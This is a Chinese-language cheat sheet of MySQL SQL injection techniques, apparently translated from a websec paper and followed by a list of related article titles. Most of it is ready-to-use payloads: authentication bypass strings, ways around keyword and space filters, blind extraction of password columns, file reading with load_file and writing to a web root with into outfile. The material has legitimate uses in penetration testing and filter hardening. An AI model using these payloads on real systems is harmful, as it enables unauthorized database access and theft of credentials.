MySQL隱碼攻擊技巧
原文地址:http://websec.files.wordpress.com/2010/11/sqli2.pdf
0x00、介紹
也可以參考瞌腄龍的mysql注入科普:/tips/?id=123
很多東西都是一樣的,但是有一些小技巧確實很使用。
以下所有技巧都只在mysql適用,因為它太靈活了
0x01 MYSQl靈活的語法
1 MySQL語法以及認證繞過
註釋符:
#,
-- X(X為任意字元)
/*(MySQL-5.1)
;%00
`
'or 1=1;%00
'or 1=1 union select 1,2`'
'or 1=1 #
'/*!50000or*/ 1=1 -- - //版本號為5.1.38時只要小於50138
'/*!or*/ 1=1 -- -
字首:
任意混合 + - ~ !
'or --+2=- -!!!'2
測試後發現and/or
後面可以跟上偶數個!、~
可以替代空格,也可以混合使用(混合後規律又不同),and/or前的空格可以省略
'or- -!!!1=1;
運算子:
^, =, !=, %, /, *, &, &&, |, ||, <, >, <<, >>, >=, <=, <>, <=>, XOR,DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN,……
'or 1 rlike '1
空格替換:%20, %09, %0a, %0b, %0c, %0d, %a0
也可以插入括號,字首,運算子,引號
'or+(1)sounds/**/like"1"--%a0-
字串格式
' or "a"='a'
' or 'a'=n'a' //unicode
' or 'a'=b'1100001' //binary
' or 'a'=_binary'1100001' //5.5.41下測試無效
' or 'a'=x'61' //16進位制
2、MySQL常用的一些小工具
常量:true, false, null, \N, current_timestamp....
變數:@myvar:=1
系統變數:@@version, @@datadir....
常用函式:version(), pi(), pow(), char(), substring()....
3、MySQL型別轉換
' or 1=true #true=1, false=0
' or 1 #true
' or version()=5.5 #5.5.41-log
' or round(pi(),1)+true+true+0.4=version() #3.1+1+1+0.4
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users
以上的語句都是同樣的效果
4、認證繞過
繞過語句:'='
select data from users where name="="
select data from users where flase="
select data from users where 0=0
繞過語句:'-'
select data from users where name=''-''
select data from users where name=0-0
select data from users where 0=0
0x02 關鍵字過濾
空格
過濾程式碼/\s/
%20, %09, %0a, %0b, %0c, %0d, %a0
關鍵字OR,AND
過濾程式碼/\sor\s/i,/\sand\s/i
'||1='1 #or
'='
'&&1='1 #and
關鍵字union select
過濾程式碼/union\s+select/i
'and(true)like(false)union(select(pass)from(users))#
'union [all|distinct] select pass from users#
'union%a0select pass from users#
'union/*!select*/pass from users#
/vuln.php?id=1 union/*&sort=*/select pass from users-- -
如果單獨過濾union,使用盲注來獲取資料
'and(select pass from users limit 1)='secret
透過子查詢獲取單值來進行比較
關鍵字limit
過濾程式碼/limit/i
'and(select pass from users where id=1)='a
'and(select pass from users group by id having id=1)='a
'and length((select pass from users having substr(pass,1,1)='a'))
關鍵字having
過濾程式碼/having/i
'and(select substr(group_concat(pass),1,1)from users)='a
關鍵字select ... from
過濾程式碼/SELECT\s+[A-Za-z.]+\s+FROM/i/i
select [all|distinct] pass from users
select`table_name`from`information_schema` . `tables`
select pass as alias from users
select pass aliasalias from users
select pass`alias alias`from users
select+pass%a0from(users)
關鍵字select
過濾程式碼/select/i
1 有檔案讀取許可權
' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+
length('DocumentRoot'),10)='a'='' into outfile '/var/www/dump.txt
2 獲取列名
' and 列名 is not null#
' procedure analyse()#
使用substr來做過濾條件
'and substr(pass,1,1)='a
關鍵字select,and,&
'0#
select data from users where name = ''-0 # int typecast
select data from users where name = 0 # int typecast
select data from users where 0 = 0 # true
'-1#
select data from users where 0 = -1 # false
使用條件判斷來進行true、false
的選擇
ifnull(nullif()), case when, if()
'-if(name='Admin',1,0)#
使用巢狀條件'-if(
if(name='Admin',1,0), // condition
if(substr(pass,1,1)='a',1,0) // if true
,0)# // if false
0x03 函式過濾
構建字串相關函式
unhex char hex ascii ord substr substring mid pad left right insert
' and substr(data,1,1) = 'a'#
' and substr(data,1,1) = 0x61# 0x6162
' and substr(data,1,1) = unhex(61)# unhex(6162)
' and substr(data,1,1) = char(97)# char(97,98)
' and hex(substr(data,1,1)) = 61#
' and ascii(substr(data,1,1)) = 97#
' and ord(substr(data,1,1)) = 97#
使用conv來進行進位制的轉換
' and substr(data,1,1) = lower(conv(10,10,36))# 'a'
' and substr(data,1,1) = lower(conv(11,10,36))# 'b'
' and substr(data,1,1) = lower(conv(36,10,36))# 'z'
使用函式來猜解資料
' and substr(data,1,1) = 'a'#
' and substring(data,1,1) = 'a'#
' and mid(data,1,1) = 'a'#
不適用逗號來獲取
' and substr(data from 1 for 1) = 'a'#
同樣也可以使用一下比較少見的函式來嘗試繞過
lpad(data,1,space(1)) // lpad('hi',4,'?') = '??hi'
rpad(data,1,space(1)) // rpad('hi',4,'?') = 'hi??'
left(data,1)
reverse(right(reverse(data),1))
insert(insert(version(),1,0,space(0)),2,222,space(0))
有些函式有類似搜尋匹配的功能
'-if(locate('f',data),1,0)#
'-if(locate('fo',data),1,0)#
'-if(locate('foo',data),1,0)#
instr(), position()
使用函式進行字串的切割
length(trim(leading 'a' FROM data)) # length will be shorter
length(replace(data, 'a', '')) # length will be shorter
2種方式都是相同效果
0x04 注入時主要使用的一些東西
1個控制流程操作(select, case, if(), ...)
1個比較操作(=, like, mod(), ...)
1個字串的猜解(mid(), left(), rpad(), …)
1個字串生成(0x61, hex(), conv())
使用conv([10-36],10,36)
可以實現所有字元的表示
false !pi() 0 ceil(pi()*pi()) 10 A ceil((pi()+pi())*pi()) 20 K
true !!pi() 1 ceil(pi()*pi())+true 11 B ceil(ceil(pi())*version()) 21 L
true+true 2 ceil(pi()+pi()+version()) 12 C ceil(pi()*ceil(pi()+pi())) 22 M
floor(pi()) 3 floor(pi()*pi()+pi()) 13 D ceil((pi()+ceil(pi()))*pi()) 23 N
ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 E ceil(pi())*ceil(version()) 24 O
floor(version()) 5 ceil(pi()*pi()+version()) 15 F floor(pi()*(version()+pi())) 25 P
ceil(version()) 6 floor(pi()*version()) 16 G floor(version()*version()) 26 Q
ceil(pi()+pi()) 7 ceil(pi()*version()) 17 H ceil(version()*version()) 27 R
floor(version()+pi()) 8 ceil(pi()*version())+true 18 I ceil(pi()*pi()*pi()-pi()) 28 S
floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 J floor(pi()*pi()*floor(pi())) 29 T
更多詳細的東西可以參考原文去了解,還有一些其他的注入資料可以參考
http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf
https://media.blackhat.com/bh-us-12/Briefings/Ristic/BH_US_12_Ristic_Protocol_Level_Slides.pdf
http://www.blackhatlibrary.net/SQL_injection
http://websec.ca/kb/sql_injection
相關文章
- MYSQL SQL隱碼攻擊2021-11-20MySql
- MySQL隱碼攻擊工具sqlsus2017-05-25MySql
- SQL隱碼攻擊2024-07-02SQL
- MySQL隱碼攻擊Fuzz過濾字元字典2020-11-06MySql字元
- 【SQL隱碼攻擊原理】2018-01-17SQL
- 防止SQL隱碼攻擊2010-04-20SQL
- SQL隱碼攻擊(一)2009-12-14SQL
- SQL隱碼攻擊(pikachu)2024-05-10SQL
- SQL隱碼攻擊方法2024-07-08SQL
- 使用PDO查詢mysql避免SQL隱碼攻擊2017-07-03MySql
- SQL隱碼攻擊式攻擊掃描器2008-07-15SQL
- SQL隱碼攻擊原理是什麼?如何防範SQL隱碼攻擊?2022-11-24SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句注入2014-02-16SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句修改2014-02-16SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-驗證檢查2014-02-16SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-繫結變數2014-02-16SQL變數
- 攻擊JavaWeb應用[3]-SQL隱碼攻擊[1]2020-08-19JavaWebSQL
- 攻擊JavaWeb應用[4]-SQL隱碼攻擊[2]2020-08-19JavaWebSQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊2014-02-16SQL
- SQL隱碼攻擊語句2018-07-25SQL
- pikachu-SQL隱碼攻擊2020-11-21SQL
- SQL隱碼攻擊導圖2018-06-15SQL
- SQL隱碼攻擊問題2017-03-30SQL
- SQL隱碼攻擊的例子2017-03-13SQL
- ZMLCMS-SQL隱碼攻擊2017-08-20SQL
- 【SQL Server】--SQL隱碼攻擊2015-01-31SQLServer
- SQL隱碼攻擊演練2013-09-16SQL
- 預防SQL隱碼攻擊2010-04-02SQL
- SQL隱碼攻擊總結2024-08-31SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-顯式格式化模型2014-02-16SQL模型
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-資料型別轉換2014-02-16SQL資料型別
- 六個建議防止SQL隱碼攻擊式攻擊2009-04-20SQL
- day40:MySQL:python操作mysql:pymysql模組&SQL隱碼攻擊2020-08-28MySqlPython
- MySQL隱碼攻擊直接獲取Shell的前提條件2019-03-28MySql
- MySQL隱碼攻擊之Fuzz測試&Bypass WAF小結2024-06-02MySql
- 【網路安全】什麼是SQL隱碼攻擊漏洞?SQL隱碼攻擊的特點!2021-09-06SQL
- SQL隱碼攻擊關聯分析2020-08-19SQL
- SQL隱碼攻擊-堆疊注入2021-07-04SQL